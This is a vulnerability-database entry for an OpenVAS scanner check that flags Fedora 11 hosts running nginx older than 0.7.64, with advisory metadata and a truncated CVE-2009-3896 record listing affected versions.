ID OPENVAS:136141256231066451 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2018-04-06T00:00:00
Description
The remote host is missing an update to nginx
announced via advisory FEDORA-2009-12782.
# OpenVAS Vulnerability Test
# $Id: fcore_2009_12782.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Auto-generated from advisory FEDORA-2009-12782 (nginx)
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "ChangeLog:
* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1
- update to 0.7.64
* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1
- update to 0.7.63";
tag_solution = "Apply the appropriate updates.
This update can be installed with the yum update program. Use
su -c 'yum update nginx' at the command line.
For more information, refer to Managing Software with yum,
available at http://docs.fedoraproject.org/yum/.
https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12782";
tag_summary = "The remote host is missing an update to nginx
announced via advisory FEDORA-2009-12782.";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.66451");
script_version("$Revision: 9350 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)");
script_cve_id("CVE-2009-2629", "CVE-2009-3555", "CVE-2009-3896");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Fedora Core 11 FEDORA-2009-12782 (nginx)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name : "URL" , value : "https://bugzilla.redhat.com/show_bug.cgi?id=539573");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"nginx", rpm:"nginx~0.7.64~1.fc11", rls:"FC11")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"nginx-debuginfo", rpm:"nginx-debuginfo~0.7.64~1.fc11", rls:"FC11")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:136141256231066451", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Core 11 FEDORA-2009-12782 (nginx)", "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12782.", "published": "2009-12-10T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066451", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=539573"], "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "lastseen": "2018-04-06T11:38:24", "viewCount": 1, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-04-06T11:38:24", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3555", "CVE-2009-3896", "CVE-2009-2629"]}, {"type": "nessus", "idList": ["FEDORA_2009-9630.NASL", "FREEBSD_PKG_152B27F0A15811DE990CE5B1D4C882E0.NASL", "NGINX_HTTP_REQUEST_BUFFER_OVERFLOW.NASL", "FEDORA_2009-9652.NASL", "FEDORA_2009-12775.NASL", "DEBIAN_DSA-1884.NASL", "GENTOO_GLSA-200909-18.NASL", "GENTOO_GLSA-201203-22.NASL", "FEDORA_2009-12750.NASL", "FEDORA_2009-12782.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066449", "OPENVAS:100321", "OPENVAS:1361412562310100276", "OPENVAS:136141256231071308", "OPENVAS:66449", "OPENVAS:66450", "OPENVAS:71308", "OPENVAS:1361412562310100321", "OPENVAS:136141256231066450", "OPENVAS:66451"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2009-3555"]}, {"type": "f5", "idList": ["F5:K10737", "SOL10737"]}, {"type": "gentoo", "idList": ["GLSA-200909-18", "GLSA-201203-22"]}, {"type": "seebug", "idList": ["SSV:12337", "SSV:67231", "SSV:14982", "SSV:15088", "SSV:18637"]}, {"type": "nginx", "idList": ["NGINX:CVE-2009-2629", "NGINX:CVE-2009-3896"]}, {"type": "canvas", "idList": ["NGINX"]}, {"type": "cert", "idList": ["VU:180065"]}, {"type": "freebsd", "idList": ["152B27F0-A158-11DE-990C-E5B1D4C882E0"]}, {"type": "exploitdb", "idList": ["EDB-ID:14830", "EDB-ID:10579"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2141-2:2C2CF", "DEBIAN:DSA-1884-1:95A85", "DEBIAN:DSA-2141-1:7D2D7"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22763", "SECURITYVULNS:DOC:22466", "SECURITYVULNS:VULN:10238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84112"]}, {"type": "ubuntu", "idList": ["USN-927-4"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8B4E7E8DAE5A13C8250C6C33307CD66C"]}, {"type": "cisco", "idList": ["CISCO-SA-20091105-CVE-2009-3555"]}], "modified": "2018-04-06T11:38:24", "rev": 2}, "vulnersScore": 7.8}, "pluginID": "136141256231066451", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12782.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12782 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- update to 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- update to 0.7.63\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12782\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12782.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66451\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-12782 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", rpm:\"nginx-debuginfo~0.7.64~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Fedora Local Security Checks", "immutableFields": []}
{"cve": [{"lastseen": "2021-04-21T20:47:55", "description": "src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.", "edition": 5, "cvss3": {}, "published": "2009-11-24T17:30:00", "title": "CVE-2009-3896", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3896"], "modified": "2013-09-11T06:00:00", "cpe": ["cpe:/a:nginx:nginx:0.1.41", "cpe:/a:nginx:nginx:0.7.10", "cpe:/a:nginx:nginx:0.1.34", "cpe:/a:nginx:nginx:0.7.39", "cpe:/a:nginx:nginx:0.4.6", "cpe:/a:nginx:nginx:0.7.35", "cpe:/a:nginx:nginx:0.1.29", "cpe:/a:nginx:nginx:0.6.12", "cpe:/a:nginx:nginx:0.3.44", "cpe:/a:nginx:nginx:0.3.38", "cpe:/a:nginx:nginx:0.5.13", "cpe:/a:nginx:nginx:0.2.4", "cpe:/a:nginx:nginx:0.6.0", "cpe:/a:nginx:nginx:0.7.28", "cpe:/a:nginx:nginx:0.6.13", "cpe:/a:nginx:nginx:0.3.35", "cpe:/a:nginx:nginx:0.1.23", "cpe:/a:nginx:nginx:0.5.16", "cpe:/a:nginx:nginx:0.6.9", "cpe:/a:nginx:nginx:0.7.58", "cpe:/a:nginx:nginx:0.3.0", "cpe:/a:nginx:nginx:0.1.15", "cpe:/a:nginx:nginx:0.8.14", "cpe:/a:nginx:nginx:0.5.0", "cpe:/a:nginx:nginx:0.3.47", "cpe:/a:nginx:nginx:0.3.2", "cpe:/a:nginx:nginx:0.7.2", "cpe:/a:nginx:nginx:0.7.41", "cpe:/a:nginx:nginx:0.7.31", "cpe:/a:nginx:nginx:0.7.43", "cpe:/a:nginx:nginx:0.1.43", "cpe:/a:nginx:nginx:0.3.58", "cpe:/a:nginx:nginx:0.8.13", "cpe:/a:nginx:nginx:0.7.48", "cpe:/a:nginx:nginx:0.7.36", "cpe:/a:nginx:nginx:0.7.4", "cpe:/a:nginx:nginx:0.7.50", "cpe:/a:nginx:nginx:0.5.1", "cpe:/a:nginx:nginx:0.6.10", "cpe:/a:nginx:nginx:0.2.0", "cpe:/a:nginx:nginx:0.5.7", "cpe:/a:nginx:nginx:0.1.32", "cpe:/a:nginx:nginx:0.6.33", "cpe:/a:nginx:nginx:0.3.56", "cpe:/a:nginx:nginx:0.1.30", "cpe:/a:nginx:nginx:0.3.30", "cpe:/a:nginx:nginx:0.7.40", "cpe:/a:nginx:nginx:0.7.54", "cpe:/a:nginx:nginx:0.3.40", "cpe:/a:nginx:nginx:0.3.24", "cpe:/a:nginx:nginx:0.3.60", "cpe:/a:nginx:nginx:0.6.22", "cpe:/a:nginx:nginx:0.1.6", "cpe:/a:nginx:nginx:0.5.23", "cpe:/a:nginx:nginx:0.3.39", "cpe:/a:nginx:nginx:0.7.7", "cpe:/a:nginx:nginx:0.7.14", "cpe:/a:nginx:nginx:0.5.15", "cpe:/a:nginx:nginx:0.1.35", "cpe:/a:nginx:nginx:0.3.13", "cpe:/a:nginx:nginx:0.3.53", "cpe:/a:nginx:nginx:0.7.33", "cpe:/a:nginx:nginx:0.7.45", "cpe:/a:nginx:nginx:0.3.31", "cpe:/a:nginx:nginx:0.1.0", "cpe:/a:nginx:nginx:0.3.5", "cpe:/a:nginx:nginx:0.3.6", "cpe:/a:nginx:nginx:0.3.8", "cpe:/a:nginx:nginx:0.3.34", "cpe:/a:nginx:nginx:0.5.32", "cpe:/a:nginx:nginx:0.7.56", "cpe:/a:nginx:nginx:0.1.7", "cpe:/a:nginx:nginx:0.3.4", "cpe:/a:nginx:nginx:0.5.34", "cpe:/a:nginx:nginx:0.6.17", "cpe:/a:nginx:nginx:0.1.21", "cpe:/a:nginx:nginx:0.2.5", "cpe:/a:nginx:nginx:0.3.25", "cpe:/a:nginx:nginx:0.7.57", "cpe:/a:nginx:nginx:0.6.35", "cpe:/a:nginx:nginx:0.7.34", "cpe:/a:nginx:nginx:0.2.1", "cpe:/a:nginx:nginx:0.7.11", "cpe:/a:nginx:nginx:0.6.4", "cpe:/a:nginx:nginx:0.3.10", "cpe:/a:nginx:nginx:0.6.1", "cpe:/a:nginx:nginx:0.8.7", "cpe:/a:nginx:nginx:0.5.25", "cpe:/a:nginx:nginx:0.7.38", "cpe:/a:nginx:nginx:0.6.20", "cpe:/a:nginx:nginx:0.3.16", "cpe:/a:nginx:nginx:0.5.14", "cpe:/a:nginx:nginx:0.7.42", "cpe:/a:nginx:nginx:0.3.9", "cpe:/a:nginx:nginx:0.1.26", "cpe:/a:nginx:nginx:0.8.12", "cpe:/a:nginx:nginx:0.5.2", "cpe:/a:nginx:nginx:0.1.1", "cpe:/a:nginx:nginx:0.6.24", "cpe:/a:nginx:nginx:0.7.44", "cpe:/a:nginx:nginx:0.1.18", "cpe:/a:nginx:nginx:0.7.61", "cpe:/a:nginx:nginx:0.3.46", "cpe:/a:nginx:nginx:0.6.36", "cpe:/a:nginx:nginx:0.1.33", "cpe:/a:nginx:nginx:0.3.45", "cpe:/a:nginx:nginx:0.8.11", "cpe:/a:nginx:nginx:0.5.10", "cpe:/a:nginx:nginx:0.6.32", "cpe:/a:nginx:nginx:0.1.11", "cpe:/a:nginx:nginx:0.1.38", "cpe:/a:nginx:nginx:0.7.29", "cpe:/a:nginx:nginx:0.6.26", "cpe:/a:nginx:nginx:0.7.9", "cpe:/a:nginx:nginx:0.7.37", "cpe:/a:nginx:nginx:0.5.28", "cpe:/a:nginx:nginx:0.1.45", "cpe:/a:nginx:nginx:0.2.3", "cpe:/a:nginx:nginx:0.7.53", "cpe:/a:nginx:nginx:0.3.28", "cpe:/a:nginx:nginx:0.4.1", "cpe:/a:nginx:nginx:0.3.43", "cpe:/a:nginx:nginx:0.1.36", "cpe:/a:nginx:nginx:0.5.6", "cpe:/a:nginx:nginx:0.7.5", "cpe:/a:nginx:nginx:0.3.22", "cpe:/a:nginx:nginx:0.5.35", "cpe:/a:nginx:nginx:0.3.61", "cpe:/a:nginx:nginx:0.6.31", "cpe:/a:nginx:nginx:0.5.9", "cpe:/a:nginx:nginx:0.7.21", "cpe:/a:nginx:nginx:0.8.9", "cpe:/a:nginx:nginx:0.1.8", "cpe:/a:nginx:nginx:0.6.8", "cpe:/a:nginx:nginx:0.1.10", "cpe:/a:nginx:nginx:0.5.24", "cpe:/a:nginx:nginx:0.5.30", "cpe:/a:nginx:nginx:0.7.24", "cpe:/a:nginx:nginx:0.8.1", "cpe:/a:nginx:nginx:0.7.19", "cpe:/a:nginx:nginx:0.1.22", "cpe:/a:nginx:nginx:0.1.44", "cpe:/a:nginx:nginx:0.4.0", "cpe:/a:nginx:nginx:0.7.30", "cpe:/a:nginx:nginx:0.3.11", "cpe:/a:nginx:nginx:0.3.42", "cpe:/a:nginx:nginx:0.7.1", "cpe:/a:nginx:nginx:0.6.34", "cpe:/a:nginx:nginx:0.4.13", "cpe:/a:nginx:nginx:0.5.5", "cpe:/a:nginx:nginx:0.4.2", "cpe:/a:nginx:nginx:0.3.36", "cpe:/a:nginx:nginx:0.1.39", "cpe:/a:nginx:nginx:0.8.8", "cpe:/a:nginx:nginx:0.7.12", "cpe:/a:nginx:nginx:0.8.5", "cpe:/a:nginx:nginx:0.6.11", "cpe:/a:nginx:nginx:0.7.6", "cpe:/a:nginx:nginx:0.5.12", "cpe:/a:nginx:nginx:0.3.55", "cpe:/a:nginx:nginx:0.7.0", "cpe:/a:nginx:nginx:0.3.18", "cpe:/a:nginx:nginx:0.1.19", "cpe:/a:nginx:nginx:0.7.3", "cpe:/a:nginx:nginx:0.3.26", "cpe:/a:nginx:nginx:0.6.2", "cpe:/a:nginx:nginx:0.5.19", "cpe:/a:nginx:nginx:0.3.14", "cpe:/a:nginx:nginx:0.6.7", "cpe:/a:nginx:nginx:0.7.20", "cpe:/a:nginx:nginx:0.5.22", "cpe:/a:nginx:nginx:0.1.16", "cpe:/a:nginx:nginx:0.3.29", "cpe:/a:nginx:nginx:0.3.15", "cpe:/a:nginx:nginx:0.1.27", "cpe:/a:nginx:nginx:0.7.32", "cpe:/a:nginx:nginx:0.7.16", "cpe:/a:nginx:nginx:0.1.40", "cpe:/a:nginx:nginx:0.4.12", "cpe:/a:nginx:nginx:0.3.17", "cpe:/a:nginx:nginx:0.7.60", "cpe:/a:nginx:nginx:0.5.29", "cpe:/a:nginx:nginx:0.3.3", "cpe:/a:nginx:nginx:0.3.20", "cpe:/a:nginx:nginx:0.3.50", "cpe:/a:nginx:nginx:0.5.26", "cpe:/a:nginx:nginx:0.5.37", "cpe:/a:nginx:nginx:0.6.3", "cpe:/a:nginx:nginx:0.3.59", "cpe:/a:nginx:nginx:0.5.31", "cpe:/a:nginx:nginx:0.2.6", "cpe:/a:nginx:nginx:0.3.48", "cpe:/a:nginx:nginx:0.6.15", "cpe:/a:nginx:nginx:0.3.52", "cpe:/a:nginx:nginx:0.4.10", "cpe:/a:nginx:nginx:0.8.6", "cpe:/a:nginx:nginx:0.3.19", "cpe:/a:nginx:nginx:0.4.9", "cpe:/a:nginx:nginx:0.1.25", "cpe:/a:nginx:nginx:0.7.23", "cpe:/a:nginx:nginx:0.5.27", "cpe:/a:nginx:nginx:0.7.52", "cpe:/a:nginx:nginx:0.4.5", "cpe:/a:nginx:nginx:0.1.31", "cpe:/a:nginx:nginx:0.6.25", "cpe:/a:nginx:nginx:0.3.57", "cpe:/a:nginx:nginx:0.6.23", "cpe:/a:nginx:nginx:0.1.37", "cpe:/a:nginx:nginx:0.1.9", "cpe:/a:nginx:nginx:0.3.51", "cpe:/a:nginx:nginx:0.5.21", "cpe:/a:nginx:nginx:0.7.8", "cpe:/a:nginx:nginx:0.8.10", "cpe:/a:nginx:nginx:0.3.21", "cpe:/a:nginx:nginx:0.5.36", "cpe:/a:nginx:nginx:0.4.8", "cpe:/a:nginx:nginx:0.1.12", "cpe:/a:nginx:nginx:0.3.1", "cpe:/a:nginx:nginx:0.7.26", "cpe:/a:nginx:nginx:0.4.7", "cpe:/a:nginx:nginx:0.3.37", "cpe:/a:nginx:nginx:0.5.20", "cpe:/a:nginx:nginx:0.3.32", "cpe:/a:nginx:nginx:0.1.24", "cpe:/a:nginx:nginx:0.1.14", "cpe:/a:nginx:nginx:0.3.27", "cpe:/a:nginx:nginx:0.4.4", "cpe:/a:nginx:nginx:0.3.7", "cpe:/a:nginx:nginx:0.7.22", "cpe:/a:nginx:nginx:0.6.1516", "cpe:/a:nginx:nginx:0.1.42", "cpe:/a:nginx:nginx:0.5.33", "cpe:/a:nginx:nginx:0.5.3", "cpe:/a:nginx:nginx:0.7.59", "cpe:/a:nginx:nginx:0.3.49", "cpe:/a:nginx:nginx:0.7.55", "cpe:/a:nginx:nginx:0.1.3", "cpe:/a:nginx:nginx:0.6.6", "cpe:/a:nginx:nginx:0.3.23", "cpe:/a:nginx:nginx:0.1.17", "cpe:/a:nginx:nginx:0.2.2", "cpe:/a:nginx:nginx:0.1.4", "cpe:/a:nginx:nginx:0.7.17", "cpe:/a:nginx:nginx:0.7.18", "cpe:/a:nginx:nginx:0.1.28", "cpe:/a:nginx:nginx:0.5.17", "cpe:/a:nginx:nginx:0.6.14", "cpe:/a:nginx:nginx:0.6.29", "cpe:/a:nginx:nginx:0.8.2", "cpe:/a:nginx:nginx:0.6.38", "cpe:/a:nginx:nginx:0.6.5", "cpe:/a:nginx:nginx:0.4.3", "cpe:/a:nginx:nginx:0.7.49", "cpe:/a:nginx:nginx:0.7.15", "cpe:/a:nginx:nginx:0.5.4", "cpe:/a:nginx:nginx:0.6.21", "cpe:/a:nginx:nginx:0.5.8", "cpe:/a:nginx:nginx:0.8.3", "cpe:/a:nginx:nginx:0.6.19", "cpe:/a:nginx:nginx:0.6.37", "cpe:/a:nginx:nginx:0.6.27", "cpe:/a:nginx:nginx:0.8.4", "cpe:/a:nginx:nginx:0.1.13", "cpe:/a:nginx:nginx:0.4.11", "cpe:/a:nginx:nginx:0.1.5", "cpe:/a:nginx:nginx:0.7.13", "cpe:/a:nginx:nginx:0.3.12", "cpe:/a:nginx:nginx:0.7.51", "cpe:/a:nginx:nginx:0.6.18", "cpe:/a:nginx:nginx:0.7.46", "cpe:/a:nginx:nginx:0.3.33", "cpe:/a:nginx:nginx:0.7.47", "cpe:/a:nginx:nginx:0.5.18", "cpe:/a:nginx:nginx:0.6.30", "cpe:/a:nginx:nginx:0.1.2", "cpe:/a:nginx:nginx:0.8.0", "cpe:/a:nginx:nginx:0.7.25", "cpe:/a:nginx:nginx:0.5.11", "cpe:/a:nginx:nginx:0.3.54", "cpe:/a:nginx:nginx:0.3.41", "cpe:/a:nginx:nginx:0.6.28", "cpe:/a:nginx:nginx:0.7.27", "cpe:/a:nginx:nginx:0.1.20"], "id": "CVE-2009-3896", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3896", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:nginx:nginx:0.7.27:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.40:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.56:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.38:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.23:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.31:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.38:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.44:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.25:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.57:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.49:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.33:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.26:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.40:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.44:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.40:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.56:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.21:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.35:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.37:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.52:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.32:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.39:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.39:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.20:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.27:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.37:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.29:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.6.28:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:nginx:nginx:0.5.23:*:*:*:*:*:*:*", 